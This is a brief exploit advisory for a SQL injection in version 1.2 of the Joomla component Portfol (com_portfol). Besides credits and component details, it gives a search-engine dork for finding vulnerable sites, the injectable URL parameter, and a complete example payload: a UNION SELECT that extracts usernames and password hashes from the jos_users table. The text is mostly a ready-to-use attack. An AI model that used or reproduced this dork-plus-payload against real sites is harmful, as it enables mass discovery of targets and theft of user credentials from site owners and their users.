The Joomla Portfol component suffers from a remote SQL injection vulnerability.
e14b7f15681ede07a072d0be5cc443299f5dc13e94dfcd39b4d5bc4ccfa5701b
#############################################################################
# #
# Joomla Component Portfol SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Portfol (com_portfol)"
[~] Version: "1.2"
[~] Date: "20.10.2006"
[~] Author: "mivaco"
[~] Author E-mail: "ivan@mivaco.com"
[~] Author URL: "www.mivaco.com"
########################################
[~] DORK: inurl:"com_portfol"
########################################
[~] Exploit: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=[SQL]
[~] Example: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users--
########################################